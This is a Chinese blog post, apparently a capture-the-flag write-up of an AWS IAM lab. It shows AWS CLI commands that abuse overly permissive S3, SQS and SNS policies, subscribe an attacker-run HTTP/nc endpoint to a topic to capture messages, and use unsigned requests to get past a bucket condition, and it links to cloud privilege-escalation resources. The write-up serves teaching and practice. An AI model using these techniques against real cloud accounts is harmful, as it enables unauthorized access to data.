aws云靶场和一些杂记

最新推荐文章于 2024-07-25 16:58:38 发布
最新推荐文章于 2024-07-25 16:58:38 发布
阅读量1.3k 收藏 10
点赞数 17
文章标签: aws 渗透测试 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32277727/article/details/137879332
版权

aws靶场

在AWS靶场中,存在三个安全问题:1) 一个S3存储桶政策配置错误,允许公共访问,通过访问特定域名可获取flag。2) SQS消息队列的政策没有限制角色,允许发送和接收消息,通过aws sqs命令行工具的receive-message接口最终找到flag。3) SNS主题订阅政策过于开放,允许任意Endpoint订阅,使用HTTP协议订阅并结合AWS CLI的sns confirm-subscription命令获取完整响应,从而得到flag。最后一个挑战涉及存储桶的IAM策略,通过aws s3api命令的list-objects接口,利用无签名请求绕过权限限制访问flag。

存储桶泄露

查看第一个policy给出了这个问题,可以允许列出桶的权限,注意看Principal 这里没有限制具体的访问角色,这里的*代表互联网所有人都可以访问的意思,公开桶。

img

使用s3的命令行,其实可以获取到,可以通过其他命令复制出来,aws好像是没办法直接查看内容的

img

想直接查看内容的话,可以直接把resource提供的域名直接拼接到aws的域名上amazonaws.com ,见此,flag已经出来了,可以下一关

img

SQS消息队列

查看第二个的policy如箭头所示,没有限制具体的角色,而且允许sqs进行发消息和接收消息

img

通过阅读官方文章,sqs这块,有这么多个接口可以搞,但是注意,这块我们的权限只有send和receive

https://docs.aws.amazon.com/cli/latest/reference/sqs/send-message.html

img

根据文档上的构造,那么应该是把092297851374 和 wiz-tbic-analytics-sqs-queue-ca7a1b2进行拼接

img

aws sqs send-message --queue-url https://sqs.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

构造好的请求直接发包,发现抱错了

img

还需要–message-body,那继续添加随便加上111,但是返回来的json没有flag值。那么只能从rece接收信息的参数入手了

img

继续查看官网文档,receive-message构造例子如下,有的参数是不必须的得在测试中得到真理

img

构造后进行请求,获得的响应内容多了,有个很明显的链接,访问就是flag了。

aws sqs receive-message --queue-url https://sqs.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

img

SNS托管式消息传递服务

SNS和SQS的区别:

  • SNS: SNS 是一种发布/订阅模型,其中消息发布到一个主题(Topic),然后所有订阅了该主题的终端(如应用程序、服务、端点等)都会接收到相同的消息。主题允许多个订阅者并支持广播和多播。
  • SQS: SQS 是一种队列模型,其中消息被发送到队列,然后由队列的消费者(订阅者)按照顺序处理。每条消息只能由一个消费者接收,确保消息按照顺序处理。

了解了sns的基本含义之后,我们来看题目给的policy

img

  • Action: 定义允许执行的操作,这里是 “SNS:Subscribe”,表示允许订阅 SNS 主题。
  • Resource: 定义操作作用的资源,这里是 “arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications”,表示允许对指定 SNS 主题执行订阅操作。
  • Condition: 是一个可选的部分,定义允许或拒绝操作的条件。在这里,使用了 “StringLike” 条件,要求 “sns:Endpoint” 的值符合 “*@tbic.wiz.io” 这个模式。

还是老样子,我们查看官方的文档

img

那么其实sns里面有protocol参数,可以指定http请求

img

那么subscribe权限下,获取http订阅消息的cli参数命令示例如下

aws sns subscribe --topic-arn arn:aws:sns:us-east-1:123456789012:MyTopic \
    --protocol http \
    --notification-endpoint http://example.com/endpoint

把题目给的参数带上发送请求

aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \
    --protocol http \
    --notification-endpoint http://xxx:8089/@tbic.wiz.io

img

对应自己的服务器起了http服务,但是虽然能获取到响应,但是没办法获取更多的响应信息

img

琢磨了一段时间发现用tcp起端口,nc就可以获取所有响应信息了。但是这段信息里面,是没有flag的,

img

但是给过来的响应,已经提示了To confirm the subscription, visit the SubscribeURL included in this message

img

那么查阅文档后才知道确认消息的具体格式,也可以使用 aws sns confirm-subscription 命令来手动确认订阅,提供确认消息中的 Token:

aws sns confirm-subscription --topic-arn YOUR-TOPIC-ARN --token YOUR-SUBSCRIPTION-TOKEN

aws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 2336412f37fb687f5d51e6e2425c464ced460311901b18ad7c9bd3425561759e0bc3078a08b110692b8d11f962a2f83a2a0ff5067a20d9fc029a1d03eae63ce14c57cad0caeeabdf819036410bcf82b8fb95b2d2191762491329cae004ef65d7018b0c08e0a59abfff27ddabd67bd391c0f3c9fe7f6b172bac94f2f7c5eab424

虽然爆红了,说权限不够,但是还是可以收到sns发过来订阅的消息

img

在nc这边监听,获取到的message就是flag了

img

存储桶错误配置

在下面的policy可以知道,存储桶thebigiamchallenge-admin-storage-abf1321允许的操作是GetObject和ListBucket,但是"ForAllValues:StringLike"这块只允许arn:aws:iam::133713371337:user/admin 才能访问

img

这块其实想了很久,一直没有办法突破。因为没有办法绕过PrincipalArn的限制,最后是查阅官网文档:如果请求中没有上下文键或者上下文键值解析为空数据集(如空字符串),则也会返回 true

https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html

img

那么让上下文键值为空的话,查阅s3api的文档,可以带上–no-sign-request

img

发送请求,我们可以获取到flag了

aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --pre
fix 'files/' --no-sign-request

img

关于存储桶这块,我得记录一下 aws s3和aws s3api的区别 应该就是s3用的ak sk,s3api用的是sts token

记录的链接

aws相关链接

https://rzepsky.medium.com/aws-and-hackerone-ctf-write-up-4c37131f7cbb

https://www.hackthebox.com/blog/aws-pentesting-guide#common_aws_penetration_testing_techniques_within_an_attack_path

https://mystic0x1.github.io/posts/AWS-Privilege-Escalation-Part-01/

https://mystic0x1.github.io/posts/AWS-Privilege-Escalation-Part-02/

https://github.com/BishopFox/iam-vulnerable

https://github.com/andresriancho/enumerate-iam

https://github.com/ine-labs/AWSGoat 靶场

https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/ 外国佬的知识

https://mp.weixin.qq.com/s/j8PNLwDAyoSidtuNWnYsMQ 利用AWS Lambda函数漏洞实现初始访问

下载对应的cli工具

https://aws.amazon.com/cn/cli/

/.aws/credentials

img

AWS漏洞利用框架Pacu

https://www.freebuf.com/sectool/190074.html

img

img

aws ssrf+cicd流程 rce 值得回味!

https://zone.huoxian.cn/d/1303-aws-elastic-beanstalk-ssrfrce

aws 攻击笔记大全

https://wiki.teamssix.com/CloudService/IAM/

aws中的iam是什么

img

其他

黑战士安全
关注
  • 17
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
AWS S3桶对象存储攻防
墨痕诉清风的博客
05-07 114
当策略可写的时候,除了上面的将可原本不可访问的数据设置为可访问从而获得敏感数据外,如果目标网站引用了某个 s3 上的资源文件,而且我们可以对该策略进行读写的话,也可以将原本可访问的资源权限设置为不可访问,这样就会导致网站瘫痪了。通过页面特征,可以判断出这是一个 Amazon 的 S3,而且页面显示 NoSuchBucket,说明这个 Bucket 可以接管的,同时 Bucket 的名称在页面中也告诉了我们,为。
[Spring Cloud] Nacos 实战 + Aws服务器
热门推荐
Java 技术专栏,从入门到精通,熟悉企业级开发
11-20 1万+
aws服务器 + 微服务Spring Cloud Nacos 实战
AWS S3 对象存储攻防
技术超强的网络安全平台
03-18 318
0x00 前言 对象存储(Object-Based Storage),也可以叫做面向对象的存储,现在也有不少厂商直接把它叫做存储。 说到对象存储就不得不提 Amazon,Amazon S3 (Simple Storage Service) 简单存储服务,是 Amazon 的公开存储服务,与之对应的协议被称为 S3 协议,目前 S3 协议已经被视为公认的行业标准协议,因此目前国内主流的对象存储厂商基本上都会支持 S3 协议。 在 Amazon S3 标准下中,对象存储中可以有多个桶(Bucket),然后把
阿里详细介绍,与AWS和GCP比较
Coder加油站的专栏
04-30 2910
阿里也与全球各地的企业和教育机构建立了合作,推动计算和AI技术的研究和应用。作为中国领先的服务提供商,阿里凭借其在本地市场的深厚根基和全球化战略,以及在技术创新和行业解决方案方面的持续投入,已成为全球计算领域的重要力量。:由于其服务的广泛性和成熟度,AWS吸引了各种类型的客户,从初创公司到大型企业,以及政府和教育机构。:谷歌的强项在于其技术创新,特别是在数据分析和机器学习领域,因此它特别受到那些依赖高级数据处理功能的企业的欢迎,如科技公司、数据分析公司和教育研究机构。确保数据安全和合规性。
阿里AWS的CDN产品对比分析
九河云的创作之路
05-28 1236
而对于大型跨国企业,AWS CloudFront在部分发达地区的性能表现更为出色,同时与其他AWS服务的无缝集成,也能带来更好的体验。根据RightScale的计算定价报告,在美国东部地区,阿里CDN的平均带宽价格为每月0.0699美元/Mbps,而AWS CloudFront为0.085美元/Mbps。根据阿里官方统计,截至2022年底,其CDN节点已遍布全球82个国家和地区,共计2,800多个加速节点。阿里CDN的可用性也达到了100%的水平,但其全球平均连接时间略长,为88.11毫秒。
AWS和阿里对比研究二—阿里
Rocky的技术博客
08-04 3378
到了2019年的时候,阿里已经能够支撑淘宝的最高峰访问压力而不会有任何明显的算力瓶颈,包括后来的历次双一一活动,都能够完美支持其上游业务。这些互联网巨头的计算中心中运行的也不再是普通PC硬件,而重新变成了真正的企业级硬件,但是IOE的时代却已经过去了。当然,由于信息差的关系,国内的互联网公司经历过一段被IOE们“忽悠”的历史,他们将大量昂贵的企业级软硬件以打包或者一体机的方式卖给国内互联网公司。阿里在2008年的时候首次提出了去IOE的口号,而阿里的起点也是那年的10月。......
阿里AWS的对比研究一:AWS的起源
Rocky的技术博客
07-31 1801
当时亚马逊公司为了能够响应自身和客户迅速增长的存储和计算能力的需求,投资了数十亿美元到基础设施资源的采购和系统的研发上。如果说是苹果公司开创了移动互联网的时代,那么亚马逊则开启了计算服务的时代,彻底改变了企业采购和使用IT服务的模式。在开始介绍计算的各种服务,以及国内一哥阿里和全球老大亚马逊的对标产品之前,我觉得有必要回顾一下计算这个行业是如何起源的。​亚马逊在推出计算业务的初衷其实是服务在亚马逊销售产品的商家,但是其基础设施的提供能力,其实可以扩展到整个IT基础设施租赁和服务领域。...
阿里AWS对比研究三——存储产品对比
Rocky的技术博客
08-11 3945
​ 所谓的计算的”传统业务“其实就是存储和计算这两大块了。总体来说这两部分是整个计算服务的基础构件,所有的其他衍生的服务很多都需要基于存储和计算这两部分的内容。计算机技术最本质的功能就是计算和存储。......
阿里oss迁移到AWS S3
品尝人生百态
11-06 1544
实操阿里Oss迁移到AWS S3
AWS服务器申请
累了就学蚊子飞的博客
10-18 2404
EC2的配置是1GB内存,1核心CPU,存储是30GB,可以创建多个实例
AWS平台的服务概览
03-03
当我们向别人解释AWS平台所包含的那些服务的时候,许多人对AWS服务种类的丰富程度都表示惊讶。对于部分听说过AWS的人来说,他们知道AWS平台的功能主要限于EC2(弹性计算)、S3(简单存储服务)等几种我们在...
AWS 平台虚拟机操作手册
01-03
本手册旨在引导初次接触AWS平台的用户,通过简单的步骤理解和操作EC2虚拟机,包括登录AWS控制台、启动和关闭虚拟机、远程桌面登录以及查看信用余额。 **一、登录AWS Console Portal** 登录AWS控制台是使用AWS...
AWS 从业者题库(中文版)
10-22
主题:AWS 从业者题库(中文版) 适合人群:准备参加 AWS 从业者认证的技术人员 主要内容:AWS 从业者题库(中文版) 阅读建议:多次反复阅读 收获:AWS 从业者认证 介绍:AWS Certified Cloud Practitioner...
AWS平台Visio模具
04-16
AWS平台Visio模具是专为IT专业人员设计的一套图形工具,用于在Microsoft Visio中绘制和展示Amazon Web Services (AWS) 的架构图。这个模具集合包含了AWS平台中的所有服务图标,使得用户能够准确、直观地描绘出复杂...
AWS全服务历史年表:发布日期、GA和服务概述一览(四)
rralucard123的博客
07-23 681
通过4期内容,终于整理完了AWS全服务的历史年表。下期会进行一个汇总,然后开始针对比较人气的服务开始专项的介绍,敬请期待。
IEC104转MQTT网关轻松将IEC104设备数据传输到Zabbix、阿里、华为、亚马逊AWS、ThingsBoard、Ignition平台
最新发布
钡铼技术工业物联网
07-25 626
IEC104转MQTT网关BE113作为这一融合过程中的关键设备,其能够将IEC 104协议的数据转换为MQTT消息,从而轻松接入Zabbix、阿里、华为、亚马逊AWS、ThingsBoard、Ignition等平台,实现数据的实时传输、监控与分析。是一款功能强大的工业自动化平台,它提供了丰富的可视化工具、实时数据监控与处理能力。钡铼网关BE113在Zabbix、阿里、华为、亚马逊AWS、ThingsBoard、Ignition等多元化平台中的应用,为电力系统的智能化管理和监控提供了有力支持。
AWS Route 53:一站式域名注册与DNS管理解决方案
九河云的创作之路
07-25 303
作为全球领先的服务提供商,Amazon Web Services (AWS) 不仅提供强大的计算资源,还通过其服务 Route 53 提供域名注册功能。通过将域名注册与强大的 DNS 管理和其他 AWS 服务结合,用户可以更高效地管理其在线资源。它不仅提供可靠的 DNS 路由,还包括域名注册功能,使用户能够在一个平台上完成域名注册和 DNS 管理。将详细介绍 AWS 的域名注册服务,以及它如何与其他 AWS 服务无缝集成,为用户提供全面的解决方案。:直接在 AWS 控制台内完成域名搜索、注册和管理。
解决方案架构师系列 - AWS - Pinpoint
Larry的博客
07-22 699
AWS Pinpoint: Amazon Pinpoint 为营销人员和开发人员提供了一款可自定义的工具,助力他们大规模地开展跨渠道、行业和活动的客户通信。
AWS从业者认证考试题库325题解析
"AWS_CLF-C01Exam Volume:325Questions" 本文将深入探讨亚马逊AWS从业者认证考试中的核心...通过深入学习AWS Config和其他相关服务,AWS从业者能够更好地管理和维护他们的环境,从而提升组织的安全性和效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑战士安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值